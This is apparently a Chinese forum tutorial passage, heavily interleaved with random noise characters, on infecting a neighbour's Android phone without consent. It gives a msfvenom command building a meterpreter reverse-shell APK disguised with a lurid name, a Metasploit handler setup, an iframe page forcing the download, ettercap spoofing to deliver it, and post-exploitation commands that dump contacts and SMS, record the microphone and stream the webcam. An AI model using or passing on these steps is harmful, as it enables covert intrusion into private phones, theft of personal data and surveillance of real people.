0 o$ ]# a6 v) B8 t" }7 \4 b 五、msf+ettercap入侵邻居安卓手机 2 ~) a! @- L% W9 E
) k' W" x' C! L# ^; ^ p1 s ^1 b" B2 Y) a9 F+ l& ^) q
首先启动msf $ O- f, D. v" k) C
4 O+ e7 H7 t0 e& Y; v
1 V$ I6 {4 H) _5 v5 i 先用kali生成一个安卓木马,如下命令: {; e3 t# G6 [. h- k; E3 h0 C/ [
4 F9 r" V% ]5 j8 R9 n5 ]. O9 A
2 A2 Y u$ j1 s. m" N O$ X4 K$ t Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
1 g& g1 ?& v7 r7 u5 n' c9 q
1 P* c9 u# {3 }# }7 E) ~3 l" L9 I$ e
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 / D% `- z& f) j5 J; ]7 W$ ?
9 ~+ x- |9 j5 \3 z" Q
8 P! B' q9 l- U7 I9 D 然后进入msf
/ I/ V1 d* j% n$ Z F+ _0 h5 y
+ V- w& s! Y$ U2 V# f2 q, e: q N, e' R; g# {5 d q/ _7 E: Q
use exploit/multi/handler y* w- X. z6 Z% R; v' ~
; v1 k( d+ s% D( z+ Z% g& O* V: Y
+ w! E1 C* X; E. E3 i4 K# g set payload android/meterpreter/reverse_tcp
5 E2 I3 V0 E9 W( l/ \( G & F7 v: G n* t& n* T) B% i
# Z/ |4 m2 |# m& F/ [* f. C; w3 i
set LHOST 192.168.0.109 //ip为kaili的ip ( `8 \# r8 `, S( U# `2 b
+ [/ o( |% O; ]2 o+ ~/ k {
' X! G% ?3 d2 _4 J9 A' _2 Q set LPORT 44444 //端口一定要与前面生成的木马的端口一致 + h5 i! c3 P% O# H2 k) ]+ W2 \
' q4 A2 E6 T2 S5 b: Y4 ]
* O% _" [9 h5 N& q5 g u+ E# k# ^ Exploit 6 z4 c) B* C5 V4 R! v
( _# T% o% N8 q9 d$ z N! q
+ ?* x* s# C0 R# K% ?* J9 o
' A$ d( f+ |: p H2 }0 V5 w9 }4 e2 B* K 3 `; c( }- Q' q; K% x$ f4 h( A
6 G B. S2 h6 [1 D2 T U7 J
下面我们开启ettercap -G 4 Q0 z y, j# Y% g; p2 o0 ~$ A
% [5 O* V& R0 m: u9 h m4 l$ J. I2 |
我物理IP为 1 ^* W Z1 \+ a2 J1 E8 D9 K
4 a% ^+ |+ Q8 {
: K- h+ N6 o( R
$ u- I& f+ q7 g" U* d6 O; \3 W6 H
& s+ r; O8 D- @& f# K" c8 F7 s3 q r4 P3 O3 A
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
) e9 T3 a; H" j
. i9 X% y: I g& R, ?* d* U
' _. S1 A5 c i' z; d& I 下面我们来设置一下 ' g) L$ h4 y1 K
k6 M; g* f+ S* D" i& w3 e- W" U
, n% }* @/ q0 v
2 O% A5 s7 H/ k! N( F
$ M6 N0 H7 w1 T y E# n
1 c% `. ]! b% s# z4 j* e 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
0 K: r$ S, R, g( z k 7 A. n4 e {0 {: f( b4 H6 Q! ^
$ a- {- ^& c y6 s# T) D" W% v7 R
4 T: I$ {" x2 [$ v* E8 {
0 U, G8 h( ~0 i; G1 i$ T1 I
8 C3 p" Y, ^4 P* m- A- W& O8 I
) b$ n+ ?3 i8 z0 _3 P/ s( s
: d# T# p/ H, e* J! \0 y+ x; t2 g# r9 J
1 m2 z: B" u, v
6 w! @" e+ A% j; \
# S4 O" H: u2 V$ s! Q, C
& d% m: u" t0 ^5 W3 ? 8 C6 ~' t, P) {3 [. W. w
5 M7 \4 E0 i! X: y" A8 h5 B( l 7 t% T; ~4 J7 x2 }( T
9 O; g: O' V) c- W3 v: j. ~' }# s
# S3 y/ F: U% {8 E6 J
& [! q( l# ^8 x* a7 A , F4 z& m* w$ T8 {: m
/ j! D4 e' m2 Q8 l
- @- i9 W# |& @9 r, v" w$ u, x H4 g3 R5 ~4 o) M2 ] `! I2 g
% }. T8 W$ a& W. g- | # [$ E; b7 i( D3 _2 \% D9 X
& b) X8 ~, `0 k) Z, d' Z, w& R
0 q h. i: x0 Q6 Q% h" g, F. w
# P- @7 J0 \5 N& m; d" e
) R; z4 y8 W$ b# k- f% g4 r! n% a3 s
6 T' P, o+ o f: ~. a
2 B5 X& S( b& A, K3 i
8 E/ q' U, y. O: K" Z
3 ^5 ~$ C# T& R" q
3 D4 Y7 J9 v9 i' C3 ?" ~, P7 Y; |& l ]& G# Y# K
0 s0 N, M" Q/ H6 S
9 ?. r7 M6 y1 v2 w& k& n) W! l% x% _$ S4 g( k$ k
- @1 N; }. R! s5 D$ G
: F- G ^* c [! P q# E' @% i: t4 [
下面我们开始攻击
9 Q: Q8 ^# [0 w 5 C# @4 H. Q/ T4 f
1 @# F4 q# O1 K
: `3 h- Y6 g; l5 l3 g / C) M2 H/ E, N% d; r( I
, B5 X1 y1 ^! T) c0 Q % ?9 f+ W8 ^- Y# d1 z
6 o& V6 T3 P4 D' b# O6 a w
" B$ w; d$ z% s! p
$ i- g; `8 R8 W% l* ? ~
7 T8 y7 G3 w# M3 y! f( e8 O8 b
5 K# J `6 `/ T& c 9 \( O. \( _! ^% C6 ^8 |/ I
+ t0 p8 h C' j! e. o8 o6 w: ]' A0 X) l5 p& V# V
6 F5 Z( {2 W1 {2 o5 ^" {! H! v
7 q$ J; b0 _1 q" H( k( r; X* M
+ D" J" `" F# S9 R7 C 大概过了5分钟多,发现反弹成功了 ) o* G6 {' {7 B6 S5 v4 t2 h O
2 S5 k, w4 r: `( B& S
, }! G+ j2 [: J8 G ( Z7 c& {3 K K
4 Q; Z) ?7 z* v% ]. Q/ m
, v) f5 y8 A; A B+ p" K! o A. c8 v
6 F& I! N0 _1 T
' z7 ^& Z6 j' I" R- w
' w/ v- e5 O% G! w
; v! J! _" V( H
& s, s* x6 W j/ u! B$ t# M
4 ]' U8 H" b4 I: J. Q
; h8 Q# m5 p" F2 R( m3 {' _ * i& j m9 [9 N& G
) i! W7 ]/ X4 h& | / ~$ N" u+ h2 B2 \
8 y5 l2 ^5 |' |3 I: W; m
. C/ D; ?8 E( ]9 s$ L( I; o4 v
' I9 ~- y7 M. j
3 v$ C% r4 N G4 s$ y: \# K1 W+ S0 G; r6 J7 }: L/ \
4 a9 W3 I$ B a2 p. r% M+ r. ` - P/ O9 d$ c( ]8 j# h# n
4 w7 ^# i6 d4 [. b S |9 u8 k
执行命令
6 g+ U9 E! k( O2 \, k" B& l
3 {# n. J' e) c
! J$ p6 `' k U/ }; U6 S9 n+ e" ^5 z
' c1 r2 {2 H' K# [/ A! c; U
H t2 Q* r6 s5 s/ P, z! w& V# f* d+ ?: ?+ z7 a5 Z
dump_contacts --》这个是导出电话
$ \2 ?$ S, E2 H6 X+ |
2 x: P9 ~3 Z% c/ U8 W9 L* T. L+ s! }) h n Y X
dump_sms --》这个是导出信息 {7 R6 C2 g9 p4 F2 n: _
& U1 e* G! D. y8 S6 O) `; `/ L
6 Z6 c- Q! N3 q+ `3 A9 v, F
record_mic Record audio from the default microphone for X seconds
, l& Z; k" u9 E6 m4 w; X* v
, Z' p0 u, W" d2 M/ ~( t* H N/ L
webcam_chat Start a video chat
! k9 a5 X0 v: N7 ` 1 o0 G' c( m( A; j/ ?, [3 B1 F
, d+ x% g, w# e- U' A webcam_list List webcams
$ a d7 c2 J* ]3 u 3 ^0 k# P \* s& h* L! \3 L) X
& j! ^, z" r5 t3 w; [# Q webcam_snap Take a snapshot from the specified webcam
) ~/ i" h4 T7 ~. q9 R% o9 m7 r 7 }: a! a' z( y) A% k/ N9 z
! e4 _5 N' v: Z8 w) d, A8 C
webcam_stream  lay a video stream from the specified webcam 2 h5 A: o- a! w
: P2 o' O8 X! s( B
9 u0 G+ `7 f$ x1 Q4 @; w5 f
+ [8 d, O- s, Q& p- r3 i3 V x/ l0 Q J! S# q7 q! Z
5 D" {" D- T$ N' A* o
! J% C9 T6 G0 ?. J
& @% f" u8 N( m
l! Z8 m3 D% K8 P+ i4 M 我们打开看一下电话薄, . V$ t1 O" r5 U$ k- C
@# I! w/ o! c; y2 E
; g8 h, o6 ~8 ]2 V( d- s1 }- |
: E+ a ^+ O; F% ~
0 R% X, n6 R" Y' W* L. ^
; g$ j. m0 c5 d( y) z, [ 0 _+ u! `; e9 z {6 {+ b. f0 |
$ q) G% Q+ J$ ~6 Q, V1 C+ K2 I
5 r! g5 V0 r n' d8 U
& {, N0 N4 E3 p, U1 G! l: i! R 4 m, R0 Q1 ]& q% _* Q5 y6 o& P
( k% r% i U# _2 R) t; @- g
" J6 I' Z; Z1 k0 N$ B6 T+ X* p/ ~
( F- f3 l# X5 h: a9 e4 D# B
; m6 U; i6 B" I: s3 A9 M8 {
; T* a: }: n7 c0 R. W& K X 4 s" c, F* {5 E0 H6 e. N
. G$ n+ q) }( w5 L1 n W
) D1 w( F5 s- h! K/ b ) y& i% _. O w, a4 |% `
6 A9 i" ~- @0 b/ K6 ]0 B9 r! H: e8 s
我们同时欺骗成DroidJack木马,使用方法如图:
# w& P4 a: U4 i! T4 s& v. X 3 |- _5 @4 Q/ l& N2 U
8 r# Y1 Y! F$ v( r# H9 D
% G8 n* ^. V# C% u ( Q7 D$ b% O g8 @0 ^
; ?9 ~2 u; B& I- @, c7 N5 Z
- n# O7 n5 Y5 `- W, o
7 f( ^. `- m9 ?! Y/ ?
" K5 V: h6 D: Y( N0 t + o2 u% ], z5 k4 A7 x, f
' H$ m3 j! X6 }: l. K9 d
+ {) b K" ^: x# a; ^ d
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 4 m6 ~* l# c4 _3 p. Z0 e
# @- [! J* k7 G0 r2 ?6 u# I
6 o" i" O" w$ {. u2 c, R
" f* ~& O! b3 Y
3 @# J) ]) j) W9 H1 @. F7 P# L' r: |' l/ @! i$ ?$ a
0 y J( Q0 ]4 B( t4 W u2 \
0 J) U* [! a6 S4 Z n5 C. h" N
- @( q L* O+ X6 O, n
9 Y% F h3 p: a9 O/ M7 E, |
7 [, v# D0 m0 u" N7 J. [) q
# ^# k( h3 B: r% A8 O * X' H- W4 ^8 G: f8 {; B3 k
* @3 e% C) v, F , R! g$ t# s. x& e6 C8 U u- E
|